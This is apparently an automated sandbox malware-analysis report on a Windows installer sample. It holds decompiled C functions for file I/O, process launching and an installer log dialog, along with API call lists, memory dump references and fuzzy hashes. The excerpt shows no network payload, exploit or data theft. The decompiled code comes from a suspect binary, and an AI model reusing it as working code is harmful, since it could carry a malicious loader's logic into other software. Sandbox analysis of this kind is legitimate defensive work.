                                                                                    • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0040CEF0,00403579,0040CEF0,?,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3934441357-0
                                                                                    • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                    • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                                                    • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                    • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004061DB(void* _a4, void* _a8, long _a12) {
                                                                                    				int _t7;
                                                                                    				long _t11;
                                                                                    
                                                                                    				_t11 = _a12;
                                                                                    				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                    				if(_t7 == 0 || _t11 != _a12) {
                                                                                    					return 0;
                                                                                    				} else {
                                                                                    					return 1;
                                                                                    				}
                                                                                    			}





                                                                                    0x004061df
                                                                                    0x004061ef
                                                                                    0x004061f7
                                                                                    0x00000000
                                                                                    0x004061fe
                                                                                    0x00000000
                                                                                    0x00406200

                                                                                    APIs
                                                                                    • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                    • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                                                    • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                    • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004035F8(long _a4) {
                                                                                    				long _t2;
                                                                                    
                                                                                    				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                                    				return _t2;
                                                                                    			}




                                                                                    0x00403606
                                                                                    0x0040360c

                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 973152223-0
                                                                                    • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                    • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                    • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                    • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 78%
                                                                                    			E00401FA4() {
                                                                                    				void* _t9;
                                                                                    				char _t13;
                                                                                    				void* _t15;
                                                                                    				void* _t17;
                                                                                    				void* _t20;
                                                                                    				void* _t22;
                                                                                    
                                                                                    				_t19 = E00402DA6(_t15);
                                                                                    				E004056CA(0xffffffeb, _t7);
                                                                                    				_t9 = E00405C4B(_t19); // executed
                                                                                    				_t20 = _t9;
                                                                                    				if(_t20 == _t15) {
                                                                                    					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                    				} else {
                                                                                    					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                                                                                    						_t13 = E00406AE0(_t17, _t20); // executed
                                                                                    						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                                                                                    							if(_t13 != _t15) {
                                                                                    								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                    							}
                                                                                    						} else {
                                                                                    							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                                                                    						}
                                                                                    					}
                                                                                    					_push(_t20);
                                                                                    					CloseHandle();
                                                                                    				}
                                                                                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
                                                                                    				return 0;
                                                                                    			}









                                                                                    0x00401faa
                                                                                    0x00401faf
                                                                                    0x00401fb5
                                                                                    0x00401fba
                                                                                    0x00401fbe
                                                                                    0x0040292e
                                                                                    0x00401fc4
                                                                                    0x00401fc7
                                                                                    0x00401fca
                                                                                    0x00401fd2
                                                                                    0x00401fe1
                                                                                    0x00401fe3
                                                                                    0x00401fe3
                                                                                    0x00401fd4
                                                                                    0x00401fd8
                                                                                    0x00401fd8
                                                                                    0x00401fd2
                                                                                    0x00401fea
                                                                                    0x00401feb
                                                                                    0x00401feb
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                      • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                      • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                      • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                                                                                      • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                      • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                                                      • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                                                      • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2972824698-0
                                                                                    • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                                                    • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                                                                    • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                                                    • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 95%
                                                                                    			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                    				struct HWND__* _v8;
                                                                                    				long _v12;
                                                                                    				struct tagRECT _v28;
                                                                                    				void* _v36;
                                                                                    				signed int _v40;
                                                                                    				int _v44;
                                                                                    				int _v48;
                                                                                    				signed int _v52;
                                                                                    				int _v56;
                                                                                    				void* _v60;
                                                                                    				void* _v68;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				struct HWND__* _t94;
                                                                                    				long _t95;
                                                                                    				int _t100;
                                                                                    				void* _t108;
                                                                                    				intOrPtr _t130;
                                                                                    				struct HWND__* _t134;
                                                                                    				int _t156;
                                                                                    				int _t159;
                                                                                    				struct HMENU__* _t164;
                                                                                    				struct HWND__* _t168;
                                                                                    				struct HWND__* _t169;
                                                                                    				int _t171;
                                                                                    				void* _t172;
                                                                                    				short* _t173;
                                                                                    				short* _t175;
                                                                                    				int _t177;
                                                                                    
                                                                                    				_t169 =  *0x429244;
                                                                                    				_t156 = 0;
                                                                                    				_v8 = _t169;
                                                                                    				if(_a8 != 0x110) {
                                                                                    					if(_a8 == 0x405) {
                                                                                    						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                                                    					}
                                                                                    					if(_a8 != 0x111) {
                                                                                    						L17:
                                                                                    						_t171 = 1;
                                                                                    						if(_a8 != 0x404) {
                                                                                    							L25:
                                                                                    							if(_a8 != 0x7b) {
                                                                                    								goto L20;
                                                                                    							}
                                                                                    							_t94 = _v8;
                                                                                    							if(_a12 != _t94) {
                                                                                    								goto L20;
                                                                                    							}
                                                                                    							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                                                    							_a8 = _t95;
                                                                                    							if(_t95 <= _t156) {
                                                                                    								L36:
                                                                                    								return 0;
                                                                                    							}
                                                                                    							_t164 = CreatePopupMenu();
                                                                                    							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                                                    							_t100 = _a16;
                                                                                    							_t159 = _a16 >> 0x10;
                                                                                    							if(_a16 == 0xffffffff) {
                                                                                    								GetWindowRect(_v8,  &_v28);
                                                                                    								_t100 = _v28.left;
                                                                                    								_t159 = _v28.top;
                                                                                    							}
                                                                                    							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                                                    								_v60 = _t156;
                                                                                    								_v48 = 0x423748;
                                                                                    								_v44 = 0x1000;
                                                                                    								_a4 = _a8;
                                                                                    								do {
                                                                                    									_a4 = _a4 - 1;
                                                                                    									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                                                    								} while (_a4 != _t156);
                                                                                    								OpenClipboard(_t156);
                                                                                    								EmptyClipboard();
                                                                                    								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                                                    								_a4 = _t108;
                                                                                    								_t172 = GlobalLock(_t108);
                                                                                    								do {
                                                                                    									_v48 = _t172;
                                                                                    									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                                                    									 *_t173 = 0xd;
                                                                                    									_t175 = _t173 + 2;
                                                                                    									 *_t175 = 0xa;
                                                                                    									_t172 = _t175 + 2;
                                                                                    									_t156 = _t156 + 1;
                                                                                    								} while (_t156 < _a8);
                                                                                    								GlobalUnlock(_a4);
                                                                                    								SetClipboardData(0xd, _a4);
                                                                                    								CloseClipboard();
                                                                                    							}
                                                                                    							goto L36;
                                                                                    						}
                                                                                    						if( *0x42922c == _t156) {
                                                                                    							ShowWindow( *0x42a268, 8);
                                                                                    							if( *0x42a2ec == _t156) {
                                                                                    								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
                                                                                    							}
                                                                                    							E0040459D(_t171);
                                                                                    							goto L25;
                                                                                    						}
                                                                                    						 *0x421f18 = 2;
                                                                                    						E0040459D(0x78);
                                                                                    						goto L20;
                                                                                    					} else {
                                                                                    						if(_a12 != 0x403) {
                                                                                    							L20:
                                                                                    							return E0040462B(_a8, _a12, _a16);
                                                                                    						}
                                                                                    						ShowWindow( *0x429230, _t156);
                                                                                    						ShowWindow(_t169, 8);
                                                                                    						E004045F9(_t169);
                                                                                    						goto L17;
                                                                                    					}
                                                                                    				}
                                                                                    				_v52 = _v52 | 0xffffffff;
                                                                                    				_v40 = _v40 | 0xffffffff;
                                                                                    				_t177 = 2;
                                                                                    				_v60 = _t177;
                                                                                    				_v56 = 0;
                                                                                    				_v48 = 0;
                                                                                    				_v44 = 0;
                                                                                    				asm("stosd");
                                                                                    				asm("stosd");
                                                                                    				_t130 =  *0x42a270;
                                                                                    				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                                                    				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                                                    				 *0x429230 = GetDlgItem(_a4, 0x403);
                                                                                    				 *0x429228 = GetDlgItem(_a4, 0x3ee);
                                                                                    				_t134 = GetDlgItem(_a4, 0x3f8);
                                                                                    				 *0x429244 = _t134;
                                                                                    				_v8 = _t134;
                                                                                    				E004045F9( *0x429230);
                                                                                    				 *0x429234 = E00404F52(4);
                                                                                    				 *0x42924c = 0;
                                                                                    				GetClientRect(_v8,  &_v28);
                                                                                    				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                                                    				SendMessageW(_v8, 0x1061, 0,  &_v60);
                                                                                    				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                                                                                    				if(_a8 >= 0) {
                                                                                    					SendMessageW(_v8, 0x1001, 0, _a8);
                                                                                    					SendMessageW(_v8, 0x1026, 0, _a8);
                                                                                    				}
                                                                                    				if(_a12 >= _t156) {
                                                                                    					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                                                    				}
                                                                                    				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                    				_push(0x1b);
                                                                                    				E004045C4(_a4);
                                                                                    				if(( *0x42a278 & 0x00000003) != 0) {
                                                                                    					ShowWindow( *0x429230, _t156);
                                                                                    					if(( *0x42a278 & 0x00000002) != 0) {
                                                                                    						 *0x429230 = _t156;
                                                                                    					} else {
                                                                                    						ShowWindow(_v8, 8);
                                                                                    					}
                                                                                    					E004045F9( *0x429228);
                                                                                    				}
                                                                                    				_t168 = GetDlgItem(_a4, 0x3ec);
                                                                                    				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                                                    				if(( *0x42a278 & 0x00000004) != 0) {
                                                                                    					SendMessageW(_t168, 0x409, _t156, _a12);
                                                                                    					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                                                    				}
                                                                                    				goto L36;
                                                                                    			}

































                                                                                    0x00405811
                                                                                    0x00405817
                                                                                    0x00405821
                                                                                    0x00405824
                                                                                    0x004059ba
                                                                                    0x004059de
                                                                                    0x004059de
                                                                                    0x004059f1
                                                                                    0x00405a0f
                                                                                    0x00405a11
                                                                                    0x00405a19
                                                                                    0x00405a6f
                                                                                    0x00405a73
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405a75
                                                                                    0x00405a7b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405a85
                                                                                    0x00405a8d
                                                                                    0x00405a90
                                                                                    0x00405b92
                                                                                    0x00000000
                                                                                    0x00405b92
                                                                                    0x00405a9f
                                                                                    0x00405aaa
                                                                                    0x00405ab3
                                                                                    0x00405abe
                                                                                    0x00405ac1
                                                                                    0x00405aca
                                                                                    0x00405ad0
                                                                                    0x00405ad3
                                                                                    0x00405ad3
                                                                                    0x00405aeb
                                                                                    0x00405af4
                                                                                    0x00405af7
                                                                                    0x00405afe
                                                                                    0x00405b05
                                                                                    0x00405b0d
                                                                                    0x00405b0d
                                                                                    0x00405b24
                                                                                    0x00405b24
                                                                                    0x00405b2b
                                                                                    0x00405b31
                                                                                    0x00405b3d
                                                                                    0x00405b44
                                                                                    0x00405b4d
                                                                                    0x00405b4f
                                                                                    0x00405b52
                                                                                    0x00405b61
                                                                                    0x00405b64
                                                                                    0x00405b6a
                                                                                    0x00405b6b
                                                                                    0x00405b71
                                                                                    0x00405b72
                                                                                    0x00405b73
                                                                                    0x00405b7b
                                                                                    0x00405b86
                                                                                    0x00405b8c
                                                                                    0x00405b8c
                                                                                    0x00000000
                                                                                    0x00405aeb
                                                                                    0x00405a21
                                                                                    0x00405a51
                                                                                    0x00405a59
                                                                                    0x00405a64
                                                                                    0x00405a64
                                                                                    0x00405a6a
                                                                                    0x00000000
                                                                                    0x00405a6a
                                                                                    0x00405a25
                                                                                    0x00405a2f
                                                                                    0x00000000
                                                                                    0x004059f3
                                                                                    0x004059f9
                                                                                    0x00405a34
                                                                                    0x00000000
                                                                                    0x00405a3d
                                                                                    0x00405a02
                                                                                    0x00405a07
                                                                                    0x00405a0a
                                                                                    0x00000000
                                                                                    0x00405a0a
                                                                                    0x004059f1
                                                                                    0x0040582a
                                                                                    0x0040582e
                                                                                    0x00405836
                                                                                    0x0040583a
                                                                                    0x0040583d
                                                                                    0x00405840
                                                                                    0x00405843
                                                                                    0x00405846
                                                                                    0x00405847
                                                                                    0x00405848
                                                                                    0x00405861
                                                                                    0x00405864
                                                                                    0x0040586e
                                                                                    0x0040587d
                                                                                    0x00405885
                                                                                    0x0040588d
                                                                                    0x00405892
                                                                                    0x00405895
                                                                                    0x004058a1
                                                                                    0x004058aa
                                                                                    0x004058b3
                                                                                    0x004058d5
                                                                                    0x004058db
                                                                                    0x004058ec
                                                                                    0x004058f1
                                                                                    0x004058ff
                                                                                    0x0040590d
                                                                                    0x0040590d
                                                                                    0x00405912
                                                                                    0x00405920
                                                                                    0x00405920
                                                                                    0x00405925
                                                                                    0x00405928
                                                                                    0x0040592d
                                                                                    0x00405939
                                                                                    0x00405942
                                                                                    0x0040594f
                                                                                    0x0040595e
                                                                                    0x00405951
                                                                                    0x00405956
                                                                                    0x00405956
                                                                                    0x0040596a
                                                                                    0x0040596a
                                                                                    0x0040597e
                                                                                    0x00405987
                                                                                    0x00405990
                                                                                    0x004059a0
                                                                                    0x004059ac
                                                                                    0x004059ac
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetDlgItem.USER32 ref: 00405867
                                                                                    • GetDlgItem.USER32 ref: 00405876
                                                                                    • GetClientRect.USER32 ref: 004058B3
                                                                                    • GetSystemMetrics.USER32 ref: 004058BA
                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405956
                                                                                    • GetDlgItem.USER32 ref: 00405977
                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                                                    • GetDlgItem.USER32 ref: 00405885
                                                                                      • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                    • GetDlgItem.USER32 ref: 004059C9
                                                                                    • CreateThread.KERNEL32 ref: 004059D7
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004059DE
                                                                                    • ShowWindow.USER32(00000000), ref: 00405A02
                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                                                    • ShowWindow.USER32(00000008), ref: 00405A51
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                                                    • CreatePopupMenu.USER32 ref: 00405A96
                                                                                    • AppendMenuW.USER32 ref: 00405AAA
                                                                                    • GetWindowRect.USER32 ref: 00405ACA
                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                                                    • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                                                    • EmptyClipboard.USER32 ref: 00405B31
                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                                                    • GlobalLock.KERNEL32 ref: 00405B47
                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                                                    • SetClipboardData.USER32 ref: 00405B86
                                                                                    • CloseClipboard.USER32 ref: 00405B8C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                    • String ID: H7B${
                                                                                    • API String ID: 590372296-2256286769
                                                                                    • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                                                    • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                                                    • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                                                    • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 78%
                                                                                    			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                    				signed int _v8;
                                                                                    				signed int _v12;
                                                                                    				long _v16;
                                                                                    				long _v20;
                                                                                    				long _v24;
                                                                                    				char _v28;
                                                                                    				intOrPtr _v32;
                                                                                    				long _v36;
                                                                                    				char _v40;
                                                                                    				unsigned int _v44;
                                                                                    				signed int _v48;
                                                                                    				WCHAR* _v56;
                                                                                    				intOrPtr _v60;
                                                                                    				intOrPtr _v64;
                                                                                    				intOrPtr _v68;
                                                                                    				WCHAR* _v72;
                                                                                    				void _v76;
                                                                                    				struct HWND__* _v80;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				intOrPtr _t82;
                                                                                    				long _t87;
                                                                                    				short* _t89;
                                                                                    				void* _t95;
                                                                                    				signed int _t96;
                                                                                    				int _t109;
                                                                                    				signed short _t114;
                                                                                    				signed int _t118;
                                                                                    				struct HWND__** _t122;
                                                                                    				intOrPtr* _t138;
                                                                                    				WCHAR* _t146;
                                                                                    				unsigned int _t150;
                                                                                    				signed int _t152;
                                                                                    				unsigned int _t156;
                                                                                    				signed int _t158;
                                                                                    				signed int* _t159;
                                                                                    				signed int* _t160;
                                                                                    				struct HWND__* _t166;
                                                                                    				struct HWND__* _t167;
                                                                                    				int _t169;
                                                                                    				unsigned int _t197;
                                                                                    
                                                                                    				_t156 = __edx;
                                                                                    				_t82 =  *0x422720;
                                                                                    				_v32 = _t82;
                                                                                    				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
                                                                                    				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                                    				if(_a8 == 0x40b) {
                                                                                    					E00405CAC(0x3fb, _t146);
                                                                                    					E004068EF(_t146);
                                                                                    				}
                                                                                    				_t167 = _a4;
                                                                                    				if(_a8 != 0x110) {
                                                                                    					L8:
                                                                                    					if(_a8 != 0x111) {
                                                                                    						L20:
                                                                                    						if(_a8 == 0x40f) {
                                                                                    							L22:
                                                                                    							_v8 = _v8 & 0x00000000;
